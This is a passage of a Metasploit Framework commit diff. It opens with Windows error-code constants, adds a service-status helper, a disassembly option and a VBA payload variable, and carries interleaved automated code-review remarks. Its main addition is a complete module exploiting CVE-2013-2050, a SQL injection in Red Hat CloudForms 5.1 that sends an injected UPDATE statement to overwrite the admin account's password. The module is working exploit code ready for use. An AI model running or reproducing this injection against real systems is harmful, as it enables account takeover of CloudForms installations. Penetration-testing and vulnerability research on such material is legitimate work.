IPSEC_DEFAULT_MM_POLICY_NOT_FOUND = 0x32D5 + IPSEC_DEFAULT_MM_AUTH_NOT_FOUND = 0x32D6 + IPSEC_DEFAULT_QM_POLICY_NOT_FOUND = 0x32D7 + IPSEC_TUNNEL_FILTER_EXISTS = 0x32D8 + IPSEC_TUNNEL_FILTER_NOT_FOUND = 0x32D9 + IPSEC_MM_FILTER_PENDING_DELETION = 0x32DA + IPSEC_TRANSPORT_FILTER_PENDING_DELETION = 0x32DB + IPSEC_TUNNEL_FILTER_PENDING_DELETION = 0x32DC + IPSEC_MM_POLICY_PENDING_DELETION = 0x32DD + IPSEC_MM_AUTH_PENDING_DELETION = 0x32DE + IPSEC_QM_POLICY_PENDING_DELETION = 0x32DF + WARNING_IPSEC_MM_POLICY_PRUNED = 0x32E0 + WARNING_IPSEC_QM_POLICY_PRUNED = 0x32E1 + IPSEC_IKE_AUTH_FAIL = 0x35E9 + IPSEC_IKE_ATTRIB_FAIL = 0x35EA + IPSEC_IKE_NEGOTIATION_PENDING = 0x35EB + IPSEC_IKE_GENERAL_PROCESSING_ERROR = 0x35EC + IPSEC_IKE_TIMED_OUT = 0x35ED + IPSEC_IKE_NO_CERT = 0x35EE + IPSEC_IKE_SA_DELETED = 0x35EF + IPSEC_IKE_SA_REAPED = 0x35F0 + IPSEC_IKE_MM_ACQUIRE_DROP = 0x35F1 + IPSEC_IKE_QM_ACQUIRE_DROP = 0x35F2 + IPSEC_IKE_QUEUE_DROP_MM = 0x35F3 + IPSEC_IKE_QUEUE_DROP_NO_MM = 0x35F4 + IPSEC_IKE_DROP_NO_RESPONSE = 0x35F5 + IPSEC_IKE_MM_DELAY_DROP = 0x35F6 + IPSEC_IKE_QM_DELAY_DROP = 0x35F7 + IPSEC_IKE_ERROR = 0x35F8 + IPSEC_IKE_CRL_FAILED = 0x35F9 + IPSEC_IKE_INVALID_KEY_USAGE = 0x35FA + IPSEC_IKE_INVALID_CERT_TYPE = 0x35FB + IPSEC_IKE_NO_PRIVATE_KEY = 0x35FC + IPSEC_IKE_DH_FAIL = 0x35FE + IPSEC_IKE_CRITICAL_PAYLOAD_NOT_RECOGNIZED = 0x35FF + IPSEC_IKE_INVALID_HEADER = 0x3600 + IPSEC_IKE_NO_POLICY = 0x3601 + IPSEC_IKE_INVALID_SIGNATURE = 0x3602 + IPSEC_IKE_KERBEROS_ERROR = 0x3603 + IPSEC_IKE_NO_PUBLIC_KEY = 0x3604 + IPSEC_IKE_PROCESS_ERR = 0x3605 + IPSEC_IKE_PROCESS_ERR_SA = 0x3606 + IPSEC_IKE_PROCESS_ERR_PROP = 0x3607 + IPSEC_IKE_PROCESS_ERR_TRANS = 0x3608 + IPSEC_IKE_PROCESS_ERR_KE = 0x3609 + IPSEC_IKE_PROCESS_ERR_ID = 0x360A + IPSEC_IKE_PROCESS_ERR_CERT = 0x360B + IPSEC_IKE_PROCESS_ERR_CERT_REQ = 0x360C + IPSEC_IKE_PROCESS_ERR_HASH = 0x360D + IPSEC_IKE_PROCESS_ERR_SIG = 0x360E + IPSEC_IKE_PROCESS_ERR_NONCE = 0x360F + IPSEC_IKE_PROCESS_ERR_NOTIFY = 0x3610 + 
IPSEC_IKE_PROCESS_ERR_DELETE = 0x3611 + IPSEC_IKE_PROCESS_ERR_VENDOR = 0x3612 + IPSEC_IKE_INVALID_PAYLOAD = 0x3613 + IPSEC_IKE_LOAD_SOFT_SA = 0x3614 + IPSEC_IKE_SOFT_SA_TORN_DOWN = 0x3615 + IPSEC_IKE_INVALID_COOKIE = 0x3616 + IPSEC_IKE_NO_PEER_CERT = 0x3617 + IPSEC_IKE_PEER_CRL_FAILED = 0x3618 + IPSEC_IKE_POLICY_CHANGE = 0x3619 + IPSEC_IKE_NO_MM_POLICY = 0x361A + IPSEC_IKE_NOTCBPRIV = 0x361B + IPSEC_IKE_SECLOADFAIL = 0x361C + IPSEC_IKE_FAILSSPINIT = 0x361D + IPSEC_IKE_FAILQUERYSSP = 0x361E + IPSEC_IKE_SRVACQFAIL = 0x361F + IPSEC_IKE_SRVQUERYCRED = 0x3620 + IPSEC_IKE_GETSPIFAIL = 0x3621 + IPSEC_IKE_INVALID_FILTER = 0x3622 + IPSEC_IKE_OUT_OF_MEMORY = 0x3623 + IPSEC_IKE_ADD_UPDATE_KEY_FAILED = 0x3624 + IPSEC_IKE_INVALID_POLICY = 0x3625 + IPSEC_IKE_UNKNOWN_DOI = 0x3626 + IPSEC_IKE_INVALID_SITUATION = 0x3627 + IPSEC_IKE_DH_FAILURE = 0x3628 + IPSEC_IKE_INVALID_GROUP = 0x3629 + IPSEC_IKE_ENCRYPT = 0x362A + IPSEC_IKE_DECRYPT = 0x362B + IPSEC_IKE_POLICY_MATCH = 0x362C + IPSEC_IKE_UNSUPPORTED_ID = 0x362D + IPSEC_IKE_INVALID_HASH = 0x362E + IPSEC_IKE_INVALID_HASH_ALG = 0x362F + IPSEC_IKE_INVALID_HASH_SIZE = 0x3630 + IPSEC_IKE_INVALID_ENCRYPT_ALG = 0x3631 + IPSEC_IKE_INVALID_AUTH_ALG = 0x3632 + IPSEC_IKE_INVALID_SIG = 0x3633 + IPSEC_IKE_LOAD_FAILED = 0x3634 + IPSEC_IKE_RPC_DELETE = 0x3635 + IPSEC_IKE_BENIGN_REINIT = 0x3636 + IPSEC_IKE_INVALID_RESPONDER_LIFETIME_NOTIFY = 0x3637 + IPSEC_IKE_QM_LIMIT_REAP = 0x3638 + IPSEC_IKE_INVALID_CERT_KEYLEN = 0x3639 + IPSEC_IKE_MM_LIMIT = 0x363A + IPSEC_IKE_NEGOTIATION_DISABLED = 0x363B + IPSEC_IKE_QM_LIMIT = 0x363C + IPSEC_IKE_MM_EXPIRED = 0x363D + IPSEC_IKE_PEER_MM_ASSUMED_INVALID = 0x363E + IPSEC_IKE_CERT_CHAIN_POLICY_MISMATCH = 0x363F + IPSEC_IKE_UNEXPECTED_MESSAGE_ID = 0x3640 + IPSEC_IKE_INVALID_AUTH_PAYLOAD = 0x3641 + IPSEC_IKE_DOS_COOKIE_SENT = 0x3642 + IPSEC_IKE_SHUTTING_DOWN = 0x3643 + IPSEC_IKE_CGA_AUTH_FAILED = 0x3644 + IPSEC_IKE_PROCESS_ERR_NATOA = 0x3645 + IPSEC_IKE_INVALID_MM_FOR_QM = 0x3646 + IPSEC_IKE_QM_EXPIRED = 0x3647 + 
IPSEC_IKE_TOO_MANY_FILTERS = 0x3648 + IPSEC_IKE_NEG_STATUS_END = 0x3649 + IPSEC_IKE_KILL_DUMMY_NAP_TUNNEL = 0x364A + IPSEC_IKE_INNER_IP_ASSIGNMENT_FAILURE = 0x364B + IPSEC_IKE_REQUIRE_CP_PAYLOAD_MISSING = 0x364C + IPSEC_KEY_MODULE_IMPERSONATION_NEGOTIATION_PENDING = 0x364D + IPSEC_IKE_COEXISTENCE_SUPPRESS = 0x364E + IPSEC_IKE_RATELIMIT_DROP = 0x364F + IPSEC_IKE_PEER_DOESNT_SUPPORT_MOBIKE = 0x3650 + IPSEC_IKE_AUTHORIZATION_FAILURE = 0x3651 + IPSEC_IKE_STRONG_CRED_AUTHORIZATION_FAILURE = 0x3652 + IPSEC_IKE_AUTHORIZATION_FAILURE_WITH_OPTIONAL_RETRY = 0x3653 + IPSEC_IKE_STRONG_CRED_AUTHORIZATION_AND_CERTMAP_FAILURE = 0x3654 + IPSEC_BAD_SPI = 0x3656 + IPSEC_SA_LIFETIME_EXPIRED = 0x3657 + IPSEC_WRONG_SA = 0x3658 + IPSEC_REPLAY_CHECK_FAILED = 0x3659 + IPSEC_INVALID_PACKET = 0x365A + IPSEC_INTEGRITY_CHECK_FAILED = 0x365B + IPSEC_CLEAR_TEXT_DROP = 0x365C + IPSEC_AUTH_FIREWALL_DROP = 0x365D + IPSEC_THROTTLE_DROP = 0x365E + IPSEC_DOSP_BLOCK = 0x3665 + IPSEC_DOSP_RECEIVED_MULTICAST = 0x3666 + IPSEC_DOSP_INVALID_PACKET = 0x3667 + IPSEC_DOSP_STATE_LOOKUP_FAILED = 0x3668 + IPSEC_DOSP_MAX_ENTRIES = 0x3669 + IPSEC_DOSP_KEYMOD_NOT_ALLOWED = 0x366A + IPSEC_DOSP_NOT_INSTALLED = 0x366B + IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES = 0x366C + SXS_SECTION_NOT_FOUND = 0x36B0 + SXS_CANT_GEN_ACTCTX = 0x36B1 + SXS_INVALID_ACTCTXDATA_FORMAT = 0x36B2 + SXS_ASSEMBLY_NOT_FOUND = 0x36B3 + SXS_MANIFEST_FORMAT_ERROR = 0x36B4 + SXS_MANIFEST_PARSE_ERROR = 0x36B5 + SXS_ACTIVATION_CONTEXT_DISABLED = 0x36B6 + SXS_KEY_NOT_FOUND = 0x36B7 + SXS_VERSION_CONFLICT = 0x36B8 + SXS_WRONG_SECTION_TYPE = 0x36B9 + SXS_THREAD_QUERIES_DISABLED = 0x36BA + SXS_PROCESS_DEFAULT_ALREADY_SET = 0x36BB + SXS_UNKNOWN_ENCODING_GROUP = 0x36BC + SXS_UNKNOWN_ENCODING = 0x36BD + SXS_INVALID_XML_NAMESPACE_URI = 0x36BE + SXS_ROOT_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36BF + SXS_LEAF_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36C0 + SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36C1 + SXS_MANIFEST_MISSING_REQUIRED_DEFAULT_NAMESPACE = 0x36C2 + 
SXS_MANIFEST_INVALID_REQUIRED_DEFAULT_NAMESPACE = 0x36C3 + SXS_PRIVATE_MANIFEST_CROSS_PATH_WITH_REPARSE_POINT = 0x36C4 + SXS_DUPLICATE_DLL_NAME = 0x36C5 + SXS_DUPLICATE_WINDOWCLASS_NAME = 0x36C6 + SXS_DUPLICATE_CLSID = 0x36C7 + SXS_DUPLICATE_IID = 0x36C8 + SXS_DUPLICATE_TLBID = 0x36C9 + SXS_DUPLICATE_PROGID = 0x36CA + SXS_DUPLICATE_ASSEMBLY_NAME = 0x36CB + SXS_FILE_HASH_MISMATCH = 0x36CC + SXS_POLICY_PARSE_ERROR = 0x36CD + SXS_XML_E_MISSINGQUOTE = 0x36CE + SXS_XML_E_COMMENTSYNTAX = 0x36CF + SXS_XML_E_BADSTARTNAMECHAR = 0x36D0 + SXS_XML_E_BADNAMECHAR = 0x36D1 + SXS_XML_E_BADCHARINSTRING = 0x36D2 + SXS_XML_E_XMLDECLSYNTAX = 0x36D3 + SXS_XML_E_BADCHARDATA = 0x36D4 + SXS_XML_E_MISSINGWHITESPACE = 0x36D5 + SXS_XML_E_EXPECTINGTAGEND = 0x36D6 + SXS_XML_E_MISSINGSEMICOLON = 0x36D7 + SXS_XML_E_UNBALANCEDPAREN = 0x36D8 + SXS_XML_E_INTERNALERROR = 0x36D9 + SXS_XML_E_UNEXPECTED_WHITESPACE = 0x36DA + SXS_XML_E_INCOMPLETE_ENCODING = 0x36DB + SXS_XML_E_MISSING_PAREN = 0x36DC + SXS_XML_E_EXPECTINGCLOSEQUOTE = 0x36DD + SXS_XML_E_MULTIPLE_COLONS = 0x36DE + SXS_XML_E_INVALID_DECIMAL = 0x36DF + SXS_XML_E_INVALID_HEXIDECIMAL = 0x36E0 + SXS_XML_E_INVALID_UNICODE = 0x36E1 + SXS_XML_E_WHITESPACEORQUESTIONMARK = 0x36E2 + SXS_XML_E_UNEXPECTEDENDTAG = 0x36E3 + SXS_XML_E_UNCLOSEDTAG = 0x36E4 + SXS_XML_E_DUPLICATEATTRIBUTE = 0x36E5 + SXS_XML_E_MULTIPLEROOTS = 0x36E6 + SXS_XML_E_INVALIDATROOTLEVEL = 0x36E7 + SXS_XML_E_BADXMLDECL = 0x36E8 + SXS_XML_E_MISSINGROOT = 0x36E9 + SXS_XML_E_UNEXPECTEDEOF = 0x36EA + SXS_XML_E_BADPEREFINSUBSET = 0x36EB + SXS_XML_E_UNCLOSEDSTARTTAG = 0x36EC + SXS_XML_E_UNCLOSEDENDTAG = 0x36ED + SXS_XML_E_UNCLOSEDSTRING = 0x36EE + SXS_XML_E_UNCLOSEDCOMMENT = 0x36EF + SXS_XML_E_UNCLOSEDDECL = 0x36F0 + SXS_XML_E_UNCLOSEDCDATA = 0x36F1 + SXS_XML_E_RESERVEDNAMESPACE = 0x36F2 + SXS_XML_E_INVALIDENCODING = 0x36F3 + SXS_XML_E_INVALIDSWITCH = 0x36F4 + SXS_XML_E_BADXMLCASE = 0x36F5 + SXS_XML_E_INVALID_STANDALONE = 0x36F6 + SXS_XML_E_UNEXPECTED_STANDALONE = 0x36F7 + 
SXS_XML_E_INVALID_VERSION = 0x36F8 + SXS_XML_E_MISSINGEQUALS = 0x36F9 + SXS_PROTECTION_RECOVERY_FAILED = 0x36FA + SXS_PROTECTION_PUBLIC_KEY_TOO_SHORT = 0x36FB + SXS_PROTECTION_CATALOG_NOT_VALID = 0x36FC + SXS_UNTRANSLATABLE_HRESULT = 0x36FD + SXS_PROTECTION_CATALOG_FILE_MISSING = 0x36FE + SXS_MISSING_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36FF + SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE_NAME = 0x3700 + SXS_ASSEMBLY_MISSING = 0x3701 + SXS_CORRUPT_ACTIVATION_STACK = 0x3702 + SXS_CORRUPTION = 0x3703 + SXS_EARLY_DEACTIVATION = 0x3704 + SXS_INVALID_DEACTIVATION = 0x3705 + SXS_MULTIPLE_DEACTIVATION = 0x3706 + SXS_PROCESS_TERMINATION_REQUESTED = 0x3707 + SXS_RELEASE_ACTIVATION_CONTEXT = 0x3708 + SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY = 0x3709 + SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE = 0x370A + SXS_INVALID_IDENTITY_ATTRIBUTE_NAME = 0x370B + SXS_IDENTITY_DUPLICATE_ATTRIBUTE = 0x370C + SXS_IDENTITY_PARSE_ERROR = 0x370D + MALFORMED_SUBSTITUTION_STRING = 0x370E + SXS_INCORRECT_PUBLIC_KEY_TOKEN = 0x370F + UNMAPPED_SUBSTITUTION_STRING = 0x3710 + SXS_ASSEMBLY_NOT_LOCKED = 0x3711 + SXS_COMPONENT_STORE_CORRUPT = 0x3712 + ADVANCED_INSTALLER_FAILED = 0x3713 + XML_ENCODING_MISMATCH = 0x3714 + SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT = 0x3715 + SXS_IDENTITIES_DIFFERENT = 0x3716 + SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT = 0x3717 + SXS_FILE_NOT_PART_OF_ASSEMBLY = 0x3718 + SXS_MANIFEST_TOO_BIG = 0x3719 + SXS_SETTING_NOT_REGISTERED = 0x371A + SXS_TRANSACTION_CLOSURE_INCOMPLETE = 0x371B + SMI_PRIMITIVE_INSTALLER_FAILED = 0x371C + GENERIC_COMMAND_FAILED = 0x371D + SXS_FILE_HASH_MISSING = 0x371E + EVT_INVALID_CHANNEL_PATH = 0x3A98 + EVT_INVALID_QUERY = 0x3A99 + EVT_PUBLISHER_METADATA_NOT_FOUND = 0x3A9A + EVT_EVENT_TEMPLATE_NOT_FOUND = 0x3A9B + EVT_INVALID_PUBLISHER_NAME = 0x3A9C + EVT_INVALID_EVENT_DATA = 0x3A9D + EVT_CHANNEL_NOT_FOUND = 0x3A9F + EVT_MALFORMED_XML_TEXT = 0x3AA0 + EVT_SUBSCRIPTION_TO_DIRECT_CHANNEL = 0x3AA1 + EVT_CONFIGURATION_ERROR = 0x3AA2 + EVT_QUERY_RESULT_STALE = 0x3AA3 + 
EVT_QUERY_RESULT_INVALID_POSITION = 0x3AA4 + EVT_NON_VALIDATING_MSXML = 0x3AA5 + EVT_FILTER_ALREADYSCOPED = 0x3AA6 + EVT_FILTER_NOTELTSET = 0x3AA7 + EVT_FILTER_INVARG = 0x3AA8 + EVT_FILTER_INVTEST = 0x3AA9 + EVT_FILTER_INVTYPE = 0x3AAA + EVT_FILTER_PARSEERR = 0x3AAB + EVT_FILTER_UNSUPPORTEDOP = 0x3AAC + EVT_FILTER_UNEXPECTEDTOKEN = 0x3AAD + EVT_INVALID_OPERATION_OVER_ENABLED_DIRECT_CHANNEL = 0x3AAE + EVT_INVALID_CHANNEL_PROPERTY_VALUE = 0x3AAF + EVT_INVALID_PUBLISHER_PROPERTY_VALUE = 0x3AB0 + EVT_CHANNEL_CANNOT_ACTIVATE = 0x3AB1 + EVT_FILTER_TOO_COMPLEX = 0x3AB2 + EVT_MESSAGE_NOT_FOUND = 0x3AB3 + EVT_MESSAGE_ID_NOT_FOUND = 0x3AB4 + EVT_UNRESOLVED_VALUE_INSERT = 0x3AB5 + EVT_UNRESOLVED_PARAMETER_INSERT = 0x3AB6 + EVT_MAX_INSERTS_REACHED = 0x3AB7 + EVT_EVENT_DEFINITION_NOT_FOUND = 0x3AB8 + EVT_MESSAGE_LOCALE_NOT_FOUND = 0x3AB9 + EVT_VERSION_TOO_OLD = 0x3ABA + EVT_VERSION_TOO_NEW = 0x3ABB + EVT_CANNOT_OPEN_CHANNEL_OF_QUERY = 0x3ABC + EVT_PUBLISHER_DISABLED = 0x3ABD + EVT_FILTER_OUT_OF_RANGE = 0x3ABE + EC_SUBSCRIPTION_CANNOT_ACTIVATE = 0x3AE8 + EC_LOG_DISABLED = 0x3AE9 + EC_CIRCULAR_FORWARDING = 0x3AEA + EC_CREDSTORE_FULL = 0x3AEB + EC_CRED_NOT_FOUND = 0x3AEC + EC_NO_ACTIVE_CHANNEL = 0x3AED + MUI_FILE_NOT_FOUND = 0x3AFC + MUI_INVALID_FILE = 0x3AFD + MUI_INVALID_RC_CONFIG = 0x3AFE + MUI_INVALID_LOCALE_NAME = 0x3AFF + MUI_INVALID_ULTIMATEFALLBACK_NAME = 0x3B00 + MUI_FILE_NOT_LOADED = 0x3B01 + RESOURCE_ENUM_USER_STOP = 0x3B02 + MUI_INTLSETTINGS_UILANG_NOT_INSTALLED = 0x3B03 + MUI_INTLSETTINGS_INVALID_LOCALE_NAME = 0x3B04 + MCA_INVALID_CAPABILITIES_STRING = 0x3B60 + MCA_INVALID_VCP_VERSION = 0x3B61 + MCA_MONITOR_VIOLATES_MCCS_SPECIFICATION = 0x3B62 + MCA_MCCS_VERSION_MISMATCH = 0x3B63 + MCA_UNSUPPORTED_MCCS_VERSION = 0x3B64 + MCA_INTERNAL_ERROR = 0x3B65 + MCA_INVALID_TECHNOLOGY_TYPE_RETURNED = 0x3B66 + MCA_UNSUPPORTED_COLOR_TEMPERATURE = 0x3B67 + AMBIGUOUS_SYSTEM_DEVICE = 0x3B92 + SYSTEM_DEVICE_NOT_FOUND = 0x3BC3 + HASH_NOT_SUPPORTED = 0x3BC4 + HASH_NOT_PRESENT = 0x3BC5 + 
+end diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb index b517358a15..2893e9b640 100644 --- a/lib/msf/core/post/windows/services.rb +++ b/lib/msf/core/post/windows/services.rb @@ -292,7 +292,7 @@ module Services # Now to grab a handle to the service. # Thank you, Wine project for defining the DELETE constant since it, # and all its friends, are missing from the MSDN docs. - # #define DELETE 0x00010000 + # #define DELETE 0x00010000 handle = adv.OpenServiceA(manager, name, 0x10000) if (handle["return"] == 0) raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") @@ -306,6 +306,50 @@ module Services handle["GetLastError"] end end + + # + # Query Service Status + # + # @param (see #service_start) + # + # @return {} representing lpServiceStatus + # + # @raise (see #service_start) + # + # + def service_status(name, server=nil) + adv = session.railgun.advapi32 + ret = nil + + # 0x80000000 GENERIC_READ + open_sc_manager(:host => server, :access => 0x80000000) do |manager| + # Now to grab a handle to the service. + handle = adv.OpenServiceA(manager, name, 0x80000000) + if (handle["return"] == 0) + raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") + end + + status = adv.QueryServiceStatus(handle["return"],28) + if (status["return"] == 0) + raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{handle["GetLastError"]}") + end + + vals = status['lpServiceStatus'].unpack('L*') + adv.CloseServiceHandle(handle["return"]) + + ret = { + :type => vals[0], + :state => vals[1], + :controls_accepted => vals[2], + :win32_exit_code => vals[3], + :service_exit_code => vals[4], + :check_point => vals[5], + :wait_hint => vals[6] + } + end + + return ret + end end end diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 12b1242090..a5d4fc147f 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb 
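Review bot: In `service_status`, the QueryServiceStatus failure message interpolates `handle["GetLastError"]`, which is the result of the earlier OpenServiceA call, so the reported code is not the one from the failed query; it should read `status["GetLastError"]`. The same failure path raises before `adv.CloseServiceHandle(handle["return"])` runs, so the service handle is left open; closing it before the raise, or in an `ensure`, avoids that. The literal `28` would also benefit from a comment saying it is the buffer size for the seven DWORD values unpacked below.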
@@ -1040,6 +1040,7 @@ def self.to_vba(framework,code,opts={}) hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8) # Specify the payload in hex as an extra file.. payload_hex = exe.unpack('H*')[0] diff --git a/lib/rex/elfscan/scanner.rb b/lib/rex/elfscan/scanner.rb index 6bba493bb8..1bd5427bff 100644 --- a/lib/rex/elfscan/scanner.rb +++ b/lib/rex/elfscan/scanner.rb @@ -1,4 +1,5 @@ # -*- coding: binary -*- +require 'metasm' module Rex module ElfScan @@ -27,6 +28,26 @@ class Generic rva = hit[0] message = hit[1].is_a?(Array) ? hit[1].join(" ") : hit[1] $stdout.puts elf.ptr_s(rva) + " " + message + if(param['disasm']) + message.gsub!("; ", "\n") + if message.include?("retn") + message.gsub!("retn", "ret") + end + + begin + d2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, message).disassemble + rescue Metasm::ParseError + d2 = Metasm::Shellcode.disassemble(Metasm::Ia32.new, [message].pack('H*')) + end + + addr = 0 + while ((di = d2.disassemble_instruction(addr))) + disasm = "0x%08x\t" % (rva + addr) + disasm << di.instruction.to_s + $stdout.puts disasm + addr = di.next_addr + end + end end end @@ -203,4 +224,3 @@ end end end end - diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb index 7db494335b..95177c31cd 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb 
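Review bot: The new `disasm` branch in lib/rex/elfscan/scanner.rb edits `message` with `gsub!`, and when `hit[1]` is a String `message` is that same object, so the scanner's hit data is modified in place as a side effect of printing. A non-mutating form such as `text = message.gsub("; ", "\n").gsub("retn", "ret")` keeps the hit intact and makes the `include?("retn")` guard unnecessary. The fallback after `Metasm::ParseError` packs the text with `'H*'`, which presumably assumes a hex string; a short comment saying which inputs are mnemonic text and which are hex would make the two paths clear. The enclosing method starts and ends outside this hunk.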
@@ -27,6 +27,10 @@ class Def_advapi32 def self.create_dll(dll_path = 'advapi32') dll = DLL.new(dll_path, ApiConstants.manager) + dll.add_function('QueryServiceStatus', 'DWORD', [ + ['LPVOID', 'hService', 'in'], + ['PBLOB', 'lpServiceStatus', 'out']]) + dll.add_function('CredEnumerateA', 'BOOL', [ ['PCHAR', 'Filter', 'in'], ['DWORD', 'Flags', 'in'], @@ -2089,10 +2093,8 @@ class Def_advapi32 ["PBLOB","pvContext","in"], ]) - return dll end - end end; end; end; end; end; end; end diff --git a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb index 6f1d79d1c7..bd07281f2d 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary | - template = template.gsub(/^\t\t/, '') + template = template.gsub(/^ {4}/, '') template = template.gsub(/\n/, '') connect diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb new file mode 100644 index 0000000000..633e009fe4 --- /dev/null +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb 
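Review bot: `QueryServiceStatus` is declared with a `'DWORD'` return type while the neighbouring `CredEnumerateA` entry uses `'BOOL'`; the Win32 function returns BOOL, so `'BOOL'` would be consistent with the rest of the table. `lpServiceStatus` is an untyped `'PBLOB'`, so the caller has to supply the buffer size; a comment giving the expected size (the caller added to services.rb in this commit passes 28) would document that contract.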
@@ -0,0 +1,175 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'bcrypt'
+require 'digest'
+require 'openssl'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize
+ super(
+ 'Name' => 'Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection',
+ 'Description' => %q{
+ This module exploits a SQL injection vulnerability in the "explorer"
+ action of "miq_policy" controller of the Red Hat CloudForms Management
+ Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by
+ changing the password of the target account to the specified password.
+ },
+ 'Author' => 'Ramon de C Valle',
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2013-2050'],
+ ['CWE', '89'],
+ ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=959062']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'SSL' => true
+ },
+ 'DisclosureDate' => 'Nov 12 2013'
+ )
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptString.new('USERNAME', [true, 'Your username']),
+ OptString.new('PASSWORD', [true, 'Your password']),
+ OptString.new('TARGETUSERNAME', [true, 'The username of the target account', 'admin']),
+ OptString.new('TARGETPASSWORD', [true, 'The password of the target account', 'smartvm']),
+ OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
+ OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ])
+ ], self.class
+ )
+ end
+
+ def password_for_newer_schema
+ # Newer versions use ActiveModel's SecurePassword.
+ BCrypt::Password.create(datastore['TARGETPASSWORD'])
+ end
+
+ def password_for_older_schema
+ # Older versions use ManageIQ's MiqPassword.
+ if datastore['TARGETPASSWORD'].empty?
+ 'v1:{}' + else + password = '1234567890123456' + salt = '6543210987654321' + cipher = OpenSSL::Cipher.new('AES-256-CBC') + cipher.encrypt + cipher.key = Digest::SHA256.digest("#{salt}#{password}")[0...32] + encrypted = cipher.update(datastore['TARGETPASSWORD']) + cipher.final + "v1:{#{Rex::Text.encode_base64(encrypted)}}" + end + end + + def password_reset? + print_status("Trying to log into #{target_url('dashboard')} using the target account...") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'), + 'vars_post' => { + 'user_name' => datastore['TARGETUSERNAME'], + 'user_password' => datastore['TARGETPASSWORD'] + } + ) + + if res.nil? + print_error('No response from remote host') + return false + end + + if res.body =~ /"Error: (.*)"/ + print_error($1) + false + else + true + end + end + + def run + print_status("Logging into #{target_url('dashboard')}...") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'), + 'vars_post' => { + 'user_name' => datastore['USERNAME'], + 'user_password' => datastore['PASSWORD'] + } + ) + + if res.nil? + print_error('No response from remote host') + return + end + + if res.body =~ /"Error: (.*)"/ + print_error($1) + return + else + session = $1 if res.headers['Set-Cookie'] =~ /_vmdb_session=(\h*)/ + + if session.nil? + print_error('Failed to retrieve the current session id') + return + end + end + + # Newer versions don't accept POST requests. + print_status("Sending password-reset request to #{target_url('miq_policy', 'explorer')}...") + send_request_cgi( + 'cookie' => "_vmdb_session=#{session}", + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'), + 'vars_get' => { + 'profile[]' => value_for_newer_schema + } + ) + + if password_reset? 
+ print_good('Password reset successfully') + return + else + print_error('Failed to reset password') + end + + print_status("Sending (older-schema) password-reset request to #{target_url('miq_policy', 'explorer')}...") + send_request_cgi( + 'cookie' => "_vmdb_session=#{session}", + 'method' => datastore['HTTP_METHOD'], + 'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'), + "vars_#{datastore['HTTP_METHOD'].downcase}" => { + 'profile[]' => value_for_older_schema + } + ) + + if password_reset? + print_good('Password reset successfully') + else + print_error('Failed to reset password') + end + end + + def target_url(*args) + (ssl ? 'https' : 'http') + + if rport.to_i == 80 || rport.to_i == 443 + "://#{vhost}" + else + "://#{vhost}:#{rport}" + end + normalize_uri(target_uri.path, *args) + end + + def value_for_newer_schema + "1 = 1); UPDATE users SET password_digest = '#{password_for_newer_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --" + end + + def value_for_older_schema + "1 = 1); UPDATE users SET password = '#{password_for_older_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --" + end +end diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index 72e8b1d846..fd96ab685d 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ 